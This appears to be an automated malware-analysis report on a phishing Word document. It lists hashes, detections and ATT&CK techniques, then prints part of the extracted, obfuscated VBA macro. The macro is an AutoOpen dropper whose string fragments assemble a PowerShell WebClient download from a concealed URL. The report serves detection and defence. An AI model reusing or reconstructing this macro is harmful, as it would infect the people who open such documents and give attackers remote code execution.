Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 865e660b5d65cfea…

MALICIOUS

Office (OLE)

102.5 KB Created: 2018-02-08 13:32:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: 9c1cb76a3ab63abe4f45c20c0c90cdc9 SHA-1: 3e6c7c5111fb6d91ab1f7152d21a09e885e993f3 SHA-256: 865e660b5d65cfea1cf8d595c281363bd399c0a47b0270dac8bb9b8e7dd9fcf1
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute external commands. The script also appears to be constructing a URL from concatenated strings, which is likely used to download a secondary payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further suggests a phishing or lure-based dropper.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://c3y+c3ywww.blueyacD4G+D4GhtchartD4G+D4c3y+c3yGer.coD4G+D4Gm/c3y In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 24155 bytes
SHA-256: b2aacc79f4f58cbcd8712be2d2491e5c9881442a1c7d4dfeb9674dee83d6e0fa
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HVpFnmFF"
Sub AutoOpen()
On Error Resume Next
ITSEREIbU = jociVzYGDtRWLw - OBYkOqfCo / (4327992 + TflPnTZwjXXbZw - 3432356 + kQFlITqCCkr)
FFAmnHXjs = nFzwPPqraw - wPulikpAojND / (5464573 + qikjTBSZGw - 2012786 + osDAKclG)
JqGAFWifD = aBUdYhFIHwSX - wbavwwoY / (7108269 + WKAckdwTn - 4314882 + WInLUWvCUo)
Application.Run "wrTPYEmLACm", LuQPFKHUKuJWn
oljHZiblj = MpjwSXEVi - diAobSnk / (5509176 + sWQiiYTUKz - 4102829 + EHHjZotwRaXJ)
LJlsfGrqI = WqZEQtDk - fpuatjvt / (9707223 + jISwGTYnboEHi - 5047038 + kRHUXAshPsTQir)
End Sub
Function LuQPFKHUKuJWn()
On Error Resume Next
sSSljX = ZGNMHXmkwJQj - VzXdkHotKdm / (8097865 + TqzzVofVGiJi - 4190318 + EKLNZsvIDQ)
sRpQiZRQTE = NHTsPcb - aDvkzocEFO / (2782639 + uPjjiwQMz - 7142596 + mjvIjMcr)
NtEdSM = iLvUJaM - wnptpCIwYk / (2044628 + LOYpsJBDf - 9314745 + dXIfjUOZImrQK)
CRttwbip = rvJWqbXiAnjwPH + Mid(("IpPRiF hWGODR+[CHAR]78),[CHAR]39  -CrEplacE'AVT',[CHAR]36)) drFjNUXi"), 14, 47)
qBkrHCvL = YJtzvMWhWZiJKC - TzOuaLUPVoQ / (2260995 + NLvOmZjdwQOivQ - 1903187 + fwRPwaVYL)
XpYbzw = nEtXLfA - TKdPXkTAVh / (71529 + fvKBqpww - 75907 + qXDkmfkbEiiW)
DYHstiBYkIq = wkQahwwFoYzWst - hVhEYhUGLmwnQ / (8904430 + RcJzLQZOQAE - 6347379 + zDOtmst)
GjiDiVc = RzjnJIbRauTnFc + Mid(("rwSJUfiLBMlupXyNSBc3y+c3y + '+'65N+65bKuMwmUIwjNspnirmjZiqjwL"), 15, 23)
YOurhLhdO = GWMshbHG - DUASGIXEB / (4645320 + tQwLkhl - 4141917 + hsYVqsjBAEQ)
tnhbv = ckacOMXwQiGH - SpYBIAql / (6171024 + LvibObVDzHNR - 6176729 + iVVNZKDlRL)
ZcwoZT = DIAsEaAwCP - kkJUuaJzwBJA / (3540033 + icMVfaiTEKSV - 2222101 + hNVdIBllEEQcb)
UTLISFMZB = BizOiiEojIfL + Mid(("OfBtJdHzHMJvMHCbNhSOwnKfach(x2D4G+c3y+c3yD4G0asfc in D4G+D4G'+'x20ADCX){D4G+D4Gt'+'ryc3y+c3y{x2D4G+D4G0YYDWMnjBOpIuj"), 25, 82)
jGvPnz = WpCQjzBYPRS - jfsQBtYHFDwN / (957732 + QKmGSjYuHTzV - 963453 + CrMKwiq)
lwUnalqV = PREjZjVTq - LwiqmJwiKlYYR / (6190448 + TENqnOarBuVCm - 1974944 + YncKJGWLFDMQU)
NvbcmD = qrAXrGc - dDalHjwQ / (1306413 + YSMkwHWi - 9425800 + ImawGmLDViuEQ)
nnEGnkwn = OWuHiFZzo + Mid((" PsfGWjkRIHM[ChAR]70+[Chc3y+c3yAR]105+[ChAR]11665N+65N),'+'[ChAR]39c3y+c3y  65N+65N-CrepLaCE Dc3y+c3y4Ge5tD4G,['+'ChAR]965N+65N2  -rePlACeD4IhzSSzRuqdTBzjKvtHWZEtUoP"), 13, 128)
siLcdaTwj = sBsFvsA - JjzqccfV / (4173864 + vcSUBvaXXzjHc - 3770453 + aFEuFIcdkvjRU)
wCIcmERUOT = HsdTXtUiYzwfXV - aBGjABW / (5233407 + QjTwhYUiGbP - 1304258 + nFaVshEz)
UbwvbLtni = kGbKtakTul - BDnaVAzfR / (4861489 + GuTNBFiIoWdqwM - 4421879 + futmjdpEkR)
OqWCQw = KYkXwpPow + Mid(("TKH+D4Git) D4G+D4GSyst'+'em.Net.WeD4G+D4GbD4G+D4GCl65N+65Nient;x20NSD4'+'G+D4GBD'+'4G+D4G = x20nsadaczzbfSfGSzJ"), 4, 97)
lmMbdRBd = jrfZfpl - uYNoNwdUkYnPcF / (2855993 + jFiQGzzpKMq - 6131709 + VOzvjvjXdmBOOo)
cfXlGKmt = NZXbcCqZ - UqwaXiBI / (9585328 + PJpTvJiGFS - 5761478 + rJpckoO)
cDtKt = ziomaqw - zwksQtZ / (9657167 + FbRtvkHjSz - 7588201 + vtNtuXkVDsFK)
XhwZwRV = zsiZjAo + Mid(("MSOJovRbOpGfClivXfG65N+6'+'5NOxND4G,[ChAR]96  -c3Sqv"), 19, 31)
rinjwcFX = KBuhGIrLTEFXwW - odUMWGQpdZ / (8992658 + BDuqOAwjVqnw - 7067200 + zJBBKmPav)
NvhzI = jSqqtMQIL - pHZOqXCmBwp / (4670625 + HHGncPHRaIf - 1326203 + JFqIZfkJYrjnLm)
vNAjSvVr = cZwYLqjjnZot - JPztHtO / (9320885 + sYKnSiPWzQcXpA - 2249325 + vGZWCjkm)
pkkRTOTtYGB = GGhllzjrEiM + Mid(("WsqdYMUDAiRXnzsTvbQzzzJ"), 12, 1)
zuHYMNRb = XATQZXQjUP - mLmoatIoXHSZX / (6307626 + zEjJTntXj - 4826045 + mJMWAfu)
BfsdjfqbPPi = DUijNmY - qQEawjGYLwLv / (9954690 + oDPXHwbBGnfSd - 9682711 + VVWuECHiwF)
cCpQfh = DoKDUwE - jbTpiaIo / (1869923 + vdGIDpboB - 9106968 + jYRSFvmqDThOT)
wsmwIODnSPP = zJsqjRXojhXO + Mid(("fswzbCWbsFniuRSSKJ4U/uzLLsjuTNPwGSCJAwkK"), 19, 3)
sBmhFfN = cwulVbf - JTzCBXZiVzGzNP / (7569032 + JmvwizcjLOpJA - 302298 + bnlEzSrAHS)
izocd = aQrPpMIEbijjO - qQrniQiT / (5473702 + KcKnYSmodtY - 2332692 + vZdAvamvEXuIC)
ASRHq = NZCKHoM 
... (truncated)